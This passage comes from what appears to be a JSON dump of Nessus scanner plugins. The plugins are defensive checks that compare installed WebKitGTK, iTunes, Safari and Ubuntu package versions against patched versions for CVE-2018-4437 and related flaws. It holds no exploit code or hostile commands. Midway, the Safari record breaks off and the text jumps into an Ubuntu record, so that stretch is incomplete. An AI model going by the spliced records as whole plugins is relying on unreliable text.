reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:24", "description": "This update for webkit2gtk3 to version 2.22.5 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory corruption (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464: Fixed multiple memory corruption issues with improved memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557, bsc#1119558)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", 
"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2019-108.NASL", "href": "https://www.tenable.com/plugins/nessus/121538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-108.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121538);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-108)\");\n script_summary(english:\"Check for the openSUSE-2019-108 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.22.5 fixes the following\nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory\n corruption (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442,\n CVE-2018-4443, CVE-2018-4464: Fixed multiple memory\n corruption issues with improved memory handling\n (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\n bsc#1119558)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/31\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-18.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-minibrowser-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.22.5-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:48", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.9.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT209345 advisory.\n\n - Visiting a malicious website may lead to address bar spoofing (CVE-2018-4440)\n\n - Visiting a malicious website may lead to user interface spoofing (CVE-2018-4439)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4437, CVE-2018-4464)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4441, CVE-2018-4442, CVE-2018-4443)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4438)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-19T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.9.2 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4440", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2019-10-31T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_9_2.NASL", "href": "https://www.tenable.com/plugins/nessus/119767", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119767);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/31 15:18:52\");\n\n script_cve_id(\n \"CVE-2018-4437\",\n \"CVE-2018-4438\",\n \"CVE-2018-4439\",\n \"CVE-2018-4440\",\n \"CVE-2018-4441\",\n \"CVE-2018-4442\",\n \"CVE-2018-4443\",\n \"CVE-2018-4464\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT209345\");\n\n script_name(english:\"Apple 
iTunes < 12.9.2 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on remote host is affected by multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.9.2. It is, therefore, affected by multiple\nvulnerabilities as referenced in the HT209345 advisory.\n\n - Visiting a malicious website may lead to address bar spoofing\n (CVE-2018-4440)\n\n - Visiting a malicious website may lead to user interface spoofing\n (CVE-2018-4439)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2018-4437, CVE-2018-4464)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2018-4441, CVE-2018-4442, CVE-2018-4443)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. 
(CVE-2018-4438)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-ie/HT209345\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.9.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\nconstraints = [{'fixed_version':'12.9.2'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:55", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 12.0.2. It is, therefore, affected by the following vulnerabilities :\n\n - Input-validation errors exist that allow memory corruption leading to arbitrary code execution.\n (CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464)\n\nNote that other flaws exist that allow information disclosure and address bar spoofing.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-07T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 12.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4440", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4445", "CVE-2018-4464"], "modified": "2019-11-01T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI12_0_2.NASL", "href": "https://www.tenable.com/plugins/nessus/119498", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119498);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-4437\",\n \"CVE-2018-4438\",\n \"CVE-2018-4439\",\n \"CVE-2018-4440\",\n \"CVE-2018-4441\",\n \"CVE-2018-4442\",\n 
\"CVE-2018-4443\",\n \"CVE-2018-4445\",\n \"CVE-2018-4464\"\n );\n\n script_name(english:\"macOS : Apple Safari < 12.0.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 12.0.2. It is, therefore, affected by the following\nvulnerabilities :\n\n - Input-validation errors exist that allow memory\n corruption leading to arbitrary code execution.\n (CVE-2018-4437, CVE-2018-4438, CVE-2018-4441,\n CVE-2018-4442, CVE-2018-4443, CVE-2018-4464)\n\nNote that other flaws exist that allow information disclosure and\naddress bar spoofing.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209344\");\n # https://lists.apple.com/archives/security-announce/2018/Dec/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?244b31ab\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 12.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/05\");\n 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.24.1-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.24.1-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.24.1-0ubuntu0.18.10.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.24.1-0ubuntu0.18.10.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:28:48", "description": "This update for webkit2gtk3 to version 2.22.6 fixes the following issues (boo#1124937 
boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\nCVE-2018-4437: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119553)\n\nCVE-2018-4438: Processing maliciously crafted web content may lead to arbitrary code execution. A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n(boo#1119554)\n\nCVE-2018-4441: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119555)\n\nCVE-2018-4442: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119556)\n\nCVE-2018-4443: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119557)\n\nCVE-2018-4464: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119558)\n\nCVE-2019-6212: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6215: Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-6216: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6217: Processing maliciously crafted web content may lead to arbitrary code execution. 
Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6226: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6227: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-6229: Processing maliciously crafted web content may lead to universal cross-site scripting. A logic issue was addressed with improved validation.\n\nCVE-2019-6233: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-6234: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nOther bug fixes and changes: Make kinetic scrolling slow down smoothly when reaching the ends of pages, instead of abruptly, to better match the GTK+ behaviour.\n\nFix Web inspector magnifier under Wayland.\n\nFix garbled rendering of some websites (e.g. YouTube) while scrolling under X11.\n\nFix several crashes, race conditions, and rendering issues.\n\nFor a detailed list of changes, please refer to:\nhttps://webkitgtk.org/security/WSA-2019-0001.html\n\nhttps://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\nhttps://webkitgtk.org/security/WSA-2018-0009.html\n\nhttps://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-27T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:0497-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit-jsc", "p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": 